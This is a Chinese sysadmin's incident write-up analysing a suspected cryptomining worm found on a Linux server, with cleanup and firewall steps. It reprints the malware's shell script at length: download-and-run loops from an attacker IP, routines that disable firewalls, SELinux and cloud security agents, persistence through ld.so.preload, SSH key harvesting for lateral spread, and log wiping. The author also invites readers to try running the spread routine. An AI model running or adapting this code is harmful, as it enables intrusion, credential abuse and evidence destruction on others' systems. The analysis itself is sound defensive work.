被动抓病毒的日子(1)【入侵大佬:198.46.202.146】 一种针对Linux服务器疑似挖矿病毒流入
2021年3月8号,发现疑似挖矿病毒的流氓程序入侵,对于平常疏于安全防范的公司敲响了一记警钟。现在就详细分析下病毒的运作逻辑,至于它是干嘛的,有兴趣的小伙伴可以去挖掘一下,也许有比较有趣的收获。
目录
一、概述
二、脚本分析
1:声明和重写内核模块
2:杀死对应服务
3:卸载 云盾服务器安全(安骑士)服务
4:生成默认环境变量
5:生成定时任务
6:登录方法声明
7:lib执行文件
8:删除记录
三、总结
1:病毒清理
2:防火墙配置
3:安全预防
一、概述
2021年3月8号,在巡查到一个许久没动过的项目(负责项目的同事已经离职,自动化运维环境还没时间搞),发现其上web界面访问出错。排查了nginx代理后,锁定了问题出现是在项目服务器上。查看问题报警后,发现是个疑似挖矿病毒的流氓程序。
登录项目服务器,首先看到的就是系统推送的报警发现
好家伙,这不是被黑了是什么?查看这个文件
#!/bin/bash
while :
do
if [ -w /usr/sbin ]; then
SPATH=/usr/sbin
else
SPATH=/tmp
fi
MD5_1_XMR="360a2cd10abfd81e060baba916b62c71"
MD5_2_XMR=`md5sum $SPATH/.lib | awk '{print $1}'`
if [ "$MD5_1_XMR" = "$MD5_2_XMR" ]
then
if [ $(netstat -ant|grep '198.46.202.146:80'|grep 'ESTABLISHED'|grep -v grep|wc -l) -eq '0' ]
then
$SPATH/.lib
elif [ $(netstat -ant|grep '198.46.202.146:8899'|grep 'ESTABLISHED'|grep -v grep|wc -l) -eq '0' ]
then
(curl -s http://198.46.202.146:8899||wget -q -O - http://198.46.202.146:8899)|bash -sh
else
echo "ok"
fi
else
(curl -s http://198.46.202.146:1234/xms||wget -q -O - http://198.46.202.146:1234/xms)|bash -sh
fi
sleep 5m
done明显吧?
本来怀疑是台肉鸡,被代理做了指定攻击服务器,但是扫描后发现,这东西就是攻击服务器本器!而且非常有可能是国内用户,因为在底层执行文件中,毫不遮掩地使用了阿里云服务器的三级域名。
上面跑的是apache服务,并且相关文件也能找到。通过.ini文件的命令可以看出,它是执行了http://198.46.202.146:1234/xms 脚本文件,这玩意大家可以下下来看看,就知道这是个类似于不隐藏的木马病毒。
二、脚本分析
分析下这玩意的思路,分成几块来讲,之后写报告也方便些
1:声明和重写内核模块
#!/bin/bash
SHELL=/bin/bash
PATH=/sbin:/bin:/usr/sbin:/usr/bin
setenforce 0 2>/dev/null # 关闭了selinux,内网服务器我一般都是关闭的
ulimit -n 65535 # 修改最大文件连接数
ufw disable # 关闭ufw防火墙
iptables -F # 清空iptables规则
echo "vm.nr_hugepages=$((1168+$(nproc)))" | sudo tee -a /etc/sysctl.conf
# 上面这玩意就把我搞蒙了会儿,内存页也能和cpu扯在一起。通过普通用户声明。
sudo sysctl -w vm.nr_hugepages=$((1168+$(nproc)))
# 声明生效
echo '0' >/proc/sys/kernel/nmi_watchdog # 禁用watchdog
echo 'kernel.nmi_watchdog=0' >>/etc/sysctl.conf # 写入内核启动文件针对于上述,实际上更改了内核模块/etc/sysctl.conf配置文件,清空了iptables防火墙规则,修改了最大连接数
1、ulimit -n 1024 # 低配好养活
2、iptables 备份重写
3、删除sysctl.conf对应服务
echo "vm.nr_hugepages=0" | sudo tee -a /etc/sysctl.conf
echo '1' >/proc/sys/kernel/nmi_watchdog
echo 'kernel.nmi_watchdog=1' >>/etc/sysctl.conf2:杀死对应服务
很明显,上面的ip地址和端口,都是添加病毒文件后的关闭对应网络连接,其中包括了目前尚未查到的sshgood。这时就可以针对其禁用对应ip登录
3:卸载 云盾服务器安全(安骑士)服务
der(){
if ps aux | grep -i '[a]liyun'; then
(wget -q -O - http://update.aegis.aliyun.com/download/uninstall.sh||curl -s http://update.aegis.aliyun.com/download/uninstall.sh)|bash; lwp-download http://update.aegis.aliyun.com/download/uninstall.sh /tmp/uninstall.sh; bash /tmp/uninstall.sh
(wget -q -O - http://update.aegis.aliyun.com/download/quartz_uninstall.sh||curl -s http://update.aegis.aliyun.com/download/quartz_uninstall.sh)|bash; lwp-download http://update.aegis.aliyun.com/download/quartz_uninstall.sh /tmp/uninstall.sh; bash /tmp/uninstall.sh
pkill aliyun-service
rm -rf /etc/init.d/agentwatch /usr/sbin/aliyun-service
rm -rf /usr/local/aegis*
systemctl stop aliyun.service
systemctl disable aliyun.service
service bcm-agent stop
yum remove bcm-agent -y
apt-get remove bcm-agent -y
/usr/local/cloudmonitor/wrapper/bin/cloudmonitor.sh stop
/usr/local/cloudmonitor/wrapper/bin/cloudmonitor.sh remove
rm -rf /usr/local/cloudmonitor
elif ps aux | grep -i '[y]unjing'; then
/usr/local/qcloud/stargate/admin/uninstall.sh
/usr/local/qcloud/YunJing/uninst.sh
/usr/local/qcloud/monitor/barad/admin/uninstall.sh
fi
sleep 1
echo "DER Uninstalled"
}
der不得不说,卸载得真干净。不过这台服务器是本地开源的云服务器,并不是跑的阿里云服务器。由这点可以看出,这玩意攻击的对象包括阿里云服务器。
4:生成默认环境变量
$DLB:生成存储/检索凭证的curl语法(curl -Lk -o)
if ! [ -z "$(command -v wdl)" ] ; then DLB="wdl -O " ; fi ; if ! [ -z "$(command -v wge)" ] ; then DLB="wge -O " ; fi
if ! [ -z "$(command -v wget2)" ] ; then DLB="wget2 -O " ; fi ; if ! [ -z "$(command -v wget)" ] ; then DLB="wget -O " ; fi
if ! [ -z "$(command -v cdl)" ] ; then DLB="cdl -Lk -o " ; fi ; if ! [ -z "$(command -v cur)" ] ; then DLB="cur -Lk -o " ; fi
if ! [ -z "$(command -v curl2)" ] ; then DLB="curl2 -Lk -o " ; fi ; if ! [ -z "$(command -v curl)" ] ; then DLB="curl -Lk -o " ; fi
echo $DLB$url:url地址:198.46.202.146:1234
$liburl:lib文件地址:http://198.46.202.146:1234/lib
url="198.46.202.146:1234"
liburl="http://198.46.202.146:1234/lib"$SPATH:执行变量(/usr/sbin)
5:生成定时任务
这是我见过最流氓的定时任务注入了,烦死
添加了apache、nginx、root三个文件,所以当前用户居然是 “root” !查到这一步,我就得好好问问拥有跳板机及知晓项目密码的相关人员了。通过这个可以看到这玩意是通过什么用户进入的。
chattr -ai -V /etc/cron.d/root /etc/cron.d/apache /var/spool/cron/root /var/spool/cron/crontabs/root /etc/cron.hourly/oanacroner1 /etc/init.d/down
rm -fr /etc/cron.d/root /etc/cron.d/apache /var/spool/cron/root /var/spool/cron/crontabs/root /etc/cron.hourly/oanacroner1 /etc/init.d/down /etc/cron.d/nginx
rm -fr /var/spool/cron/crontabs对于vixie-cron 的操作,还得深究
yum install -y vixie-cron crontabs6:登录方法声明
localgo() {
echo "localgo start"
myhostip=$(curl -sL icanhazip.com)
KEYS=$(find ~/ /root /home -maxdepth 3 -name 'id_rsa*' | grep -vw pub)
KEYS2=$(cat ~/.ssh/config /home/*/.ssh/config /root/.ssh/config | grep IdentityFile | awk -F "IdentityFile" '{print $2 }')
KEYS3=$(cat ~/.bash_history /home/*/.bash_history /root/.bash_history | grep -E "(ssh|scp)" | awk -F ' -i ' '{print $2}' | awk '{print $1'})
KEYS4=$(find ~/ /root /home -maxdepth 3 -name '*.pem' | uniq)
HOSTS=$(cat ~/.ssh/config /home/*/.ssh/config /root/.ssh/config | grep HostName | awk -F "HostName" '{print $2}')
HOSTS2=$(cat ~/.bash_history /home/*/.bash_history /root/.bash_history | grep -E "(ssh|scp)" | grep -oP "([0-9]{1,3}\.){3}[0-9]{1,3}")
HOSTS3=$(cat ~/.bash_history /home/*/.bash_history /root/.bash_history | grep -E "(ssh|scp)" | tr ':' ' ' | awk -F '@' '{print $2}' | awk -F '{print $1}')
HOSTS4=$(cat /etc/hosts | grep -vw "0.0.0.0" | grep -vw "127.0.1.1" | grep -vw "127.0.0.1" | grep -vw $myhostip | sed -r '/\n/!s/[0-9.]+/\n&\n/;/^([0-9]{1,3}\.){3}[0-9]{1,3}\n/P;D' | awk '{print $1}')
HOSTS5=$(cat ~/*/.ssh/known_hosts /home/*/.ssh/known_hosts /root/.ssh/known_hosts | grep -oP "([0-9]{1,3}\.){3}[0-9]{1,3}" | uniq)
HOSTS6=$(ps auxw | grep -oP "([0-9]{1,3}\.){3}[0-9]{1,3}" | grep ":22" | uniq)
USERZ=$(
echo "root"
find ~/ /root /home -maxdepth 2 -name '\.ssh' | uniq | xargs find | awk '/id_rsa/' | awk -F'/' '{print $3}' | uniq | grep -wv ".ssh"
)
USERZ2=$(cat ~/.bash_history /home/*/.bash_history /root/.bash_history | grep -vw "cp" | grep -vw "mv" | grep -vw "cd " | grep -vw "nano" | grep -v grep | grep -E "(ssh|scp)" | tr ':' ' ' | awk -F '@' '{print $1}' | awk '{print $4}' | uniq)
sshports=$(cat ~/.bash_history /home/*/.bash_history /root/.bash_history | grep -vw "cp" | grep -vw "mv" | grep -vw "cd " | grep -vw "nano" | grep -v grep | grep -E "(ssh|scp)" | tr ':' ' ' | awk -F '-p' '{print $2}' | awk '{print $1}' | sed 's/[^0-9]*//g' | tr ' ' '\n' | nl | sort -u -k2 | sort -n | cut -f2- | sed -e "\$a22")
userlist=$(echo "$USERZ $USERZ2" | tr ' ' '\n' | nl | sort -u -k2 | sort -n | cut -f2- | grep -vw "." | grep -vw "ssh" | sed '/\./d')
hostlist=$(echo "$HOSTS $HOSTS2 $HOSTS3 $HOSTS4 $HOSTS5 $HOSTS6" | grep -vw 127.0.0.1 | tr ' ' '\n' | nl | sort -u -k2 | sort -n | cut -f2-)
keylist=$(echo "$KEYS $KEYS2 $KEYS3 $KEYS4" | tr ' ' '\n' | nl | sort -u -k2 | sort -n | cut -f2-)
i=0
for user in $userlist; do
for host in $hostlist; do
for key in $keylist; do
for sshp in $sshports; do
((i++))
if [ "${i}" -eq "20" ]; then
sleep 5
ps wx | grep "ssh -o" | awk '{print $1}' | xargs kill -9 &>/dev/null &
i=0
fi
#Wait 5 seconds after every 20 attempts and clean up hanging processes
chmod +r $key
chmod 400 $key
echo "$user@$host"
ssh -oStrictHostKeyChecking=no -oBatchMode=yes -oConnectTimeout=3 -i $key $user@$host -p $sshp "(curl -s http://$url/xms||wget -q -O - http://$url/xms)|bash -sh; echo $base | base64 -d | bash -; lwp-download http://$url/xms /tmp/xms; bash /tmp/xms; rm -rf /tmp/xms"
ssh -oStrictHostKeyChecking=no -oBatchMode=yes -oConnectTimeout=3 -i $key $user@$host -p $sshp "(curl -s http://$url/xms||wget -q -O - http://$url/xms)|bash -sh; echo $base | base64 -d | bash -; lwp-download http://$url/xms /tmp/xms; bash /tmp/xms; rm -rf /tmp/xms"
done
done
done
done
# scangogo
echo "local done"
}感兴趣的小伙伴可以执行试一下,记得将执行的命令改一下。这里应该是尝试抓取登录其他主机的信息,如果主机登陆过其他主机的话,那么其他主机也会被注入。。。想想都恐怖,还好限制他们只能单个登录虚拟主机,这要是搞一下免密登录整个集群都得完蛋!
7:lib执行文件
chattr -ia /usr/sbin/.lib /usr/sbin/.ini /usr/local/lib/* /etc/ld.so.preload
rm -fr /usr/sbin/.lib /usr/sbin/.ini /usr/local/lib/* /etc/ld.so.preload
修改:/usr/local/lib/* 全部删除
/etc/ld.so.cache
/etc/ld.so.conf因为是二进制文件,怕误删,先放它一马
MD5_1_XMR="360a2cd10abfd81e060baba916b62c71"
MD5_2_XMR=`md5sum $SPATH/.lib | awk '{print $1}'`
if [ "$SPATH" = "/usr/sbin" ]
then
chattr -ia / /usr/ /usr/local/ /usr/local/lib/ 2>/dev/null
if [ "$MD5_1_XMR" = "$MD5_2_XMR" ]
then
if [ $(netstat -ant|grep '198.46.202.146:80'|grep 'ESTABLISHED'|grep -v grep|wc -l) -eq '0' ]
then
$SPATH/.lib
chattr +ia $SPATH/.lib
localgo
elif [ $(netstat -ant|grep '198.46.202.146:8899'|grep 'ESTABLISHED'|grep -v grep|wc -l) -eq '0' ]
then
$DLB $SPATH/.ini http://$url/ini
# -----------------------http://198.46.202.146:1234/ini 这个就是一开始被报警的文件
chmod +x $SPATH/.ini 2>/dev/null
$SPATH/.ini
$SPATH/.ini
else
echo "ok"
localgo
fi
localgo # 这里执行了上面声明的登录方法
else
chattr -ia /etc/ /usr/local/lib/lib.so /usr/local/lib/ini.so /etc/ld.so.preload 2>/dev/null
chattr -ai /etc/ld.so.* 2>/dev/null
chattr -ai /usr/sbin/.lib 2>/dev/null
chattr -ai /usr/sbin/.ini 2>/dev/null
rm -f $SPATH/.lib
rm -f $SPATH/.ini
echo "" > /etc/ld.so.preload
$DLB $SPATH/.lib $liburl
$DLB /usr/local/lib/lib.so http://$url/lib.so
$DLB /usr/local/lib/ini.so http://$url/ini.so
$DLB $SPATH/.ini http://$url/ini
echo '/usr/local/lib/lib.so' >> /etc/ld.so.preload
echo '/usr/local/lib/lib.so' >> /etc/ld.so.cache
echo '/usr/local/lib/lib.so' >> /etc/ld.so.conf
echo '/usr/local/lib/ini.so' >> /etc/ld.so.preload
echo '/usr/local/lib/ini.so' >> /etc/ld.so.cache
echo '/usr/local/lib/ini.so' >> /etc/ld.so.conf
chattr +ia /usr/local/lib/lib.so
chattr +ia /usr/local/lib/ini.so
chmod +x $SPATH/.lib 2>/dev/null
chmod +x $SPATH/.ini 2>/dev/null
$SPATH/.lib
$SPATH/.ini
chattr +ai $SPATH/.lib
chattr +ai $SPATH/.ini
localgo
fi
else
if [ "$MD5_1_XMR" != "$MD5_2_XMR" ]
then
$DLB $SPATH/.lib $liburl
$DLB $SPATH/.ini http://$url/ini
chmod +x $SPATH/.lib 2>/dev/null
chmod +x $SPATH/.ini 2>/dev/null
$SPATH/.lib
$SPATH/.ini
localgo
else
if [ $(netstat -ant|grep '198.46.202.146:80'|grep 'ESTABLISHED'|grep -v grep|wc -l) -eq '0' ]
then
sudo $SPATH/.lib
localgo
elif [ $(netstat -ant|grep '198.46.202.146:8899'|grep 'ESTABLISHED'|grep -v grep|wc -l) -eq '0' ]
then
sudo $SPATH/.ini
else
echo "ok"
fi
fi
fi8:删除记录
echo 0>/root/.ssh/authorized_keys
echo 0>/var/spool/mail/root
echo 0>/var/log/wtmp
echo 0>/var/log/secure
echo 0>/var/log/cron
echo 0>~/.bash_history
history -c 2>/dev/null这个没啥好解释的,把登录痕迹全部删除。
三、总结
至此,分析情况如下
病毒攻击源来自国外(或是国内用户搭桥攻击)。总体架构旨在重新编译内核模块,并调用lib文件,lib模块暂未分析,无法查明实质性伤害。该病毒删除了原有定时任务、历史记录、秘钥用户数据及超级管理员日志。
1:病毒清理
1、ulimit -n 1024
2、iptables 备份重写
3、删除sysctl.conf对应服务
echo "vm.nr_hugepages=0" | sudo tee -a /etc/sysctl.conf
echo '1' >/proc/sys/kernel/nmi_watchdog
echo 'kernel.nmi_watchdog=1' | sudo tee -a /etc/sysctl.conf
4、删除定时任务
chattr -ai -V /etc/cron.d/root /etc/cron.d/apache /var/spool/cron/root /var/spool/cron/crontabs/root /etc/cron.hourly/oanacroner1 /etc/init.d/down
rm -fr /etc/cron.d/root /etc/cron.d/apache /var/spool/cron/root /var/spool/cron/crontabs/root /etc/cron.hourly/oanacroner1 /etc/init.d/down /etc/cron.d/nginx
rm -fr /var/spool/cron/crontabs
5、删除lib文件
chattr -ia /usr/sbin/.lib /usr/sbin/.ini /usr/local/lib/* /etc/ld.so.preload
rm -fr /usr/sbin/.lib /usr/sbin/.ini /usr/local/lib/* /etc/ld.so.preload好吧,如果没有猜错的话,新加入的lib模块应该是挖矿病毒了。具体还需测试,毕竟文件就放在这了。
权限很重要,密码控制好。
2:防火墙配置
iptables 防火墙(删除两边通信规则)
iptables -A INPUT -s 23.94.24.12/24 -j DROP
iptables -A INPUT -s 134.122.17.13/24 -j DROP
iptables -A INPUT -s 66.70.218.40/24 -j DROP
iptables -A INPUT -s 209.141.35.17/24 -j DROP
iptables -A INPUT -s 119.28.4.91/24 -j DROP
iptables -A INPUT -s 101.32.73.178/24 -j DROP
iptables -A INPUT -s 198.46.202.146/24 -j DROP
iptables -A OUTPUT -s 23.94.24.12/24 -j DROP
iptables -A OUTPUT -s 134.122.17.13/24 -j DROP
iptables -A OUTPUT -s 66.70.218.40/24 -j DROP
iptables -A OUTPUT -s 209.141.35.17/24 -j DROP
iptables -A OUTPUT -s 119.28.4.91/24 -j DROP
iptables -A OUTPUT -s 101.32.73.178/24 -j DROP
iptables -A OUTPUT -s 198.46.202.146/24 -j DROP
service iptables save
systemctl restart iptablesfirewalld 防火墙(单独禁用外部网络访问本机,显然这个并没有满足要求,还是用上面的方法)
firewall-cmd --permanent --add-rich-rule='rule family=ipv4 source address="23.94.24.12/24" drop'
firewall-cmd --permanent --add-rich-rule='rule family=ipv4 source address="134.122.17.13" drop'
firewall-cmd --permanent --add-rich-rule='rule family=ipv4 source address="66.70.218.40" drop'
firewall-cmd --permanent --add-rich-rule='rule family=ipv4 source address="209.141.35.17" drop'
firewall-cmd --permanent --add-rich-rule='rule family=ipv4 source address="119.28.4.91" drop'
firewall-cmd --permanent --add-rich-rule='rule family=ipv4 source address="101.32.73.178" drop'
firewall-cmd --permanent --add-rich-rule='rule family=ipv4 source address="198.46.202.146" drop'
firewall-cmd --reload3:安全预防
- 更改项目集群用户密码;
- 回收三方跳板机登录权限;
- 开启ip防火墙限制策略。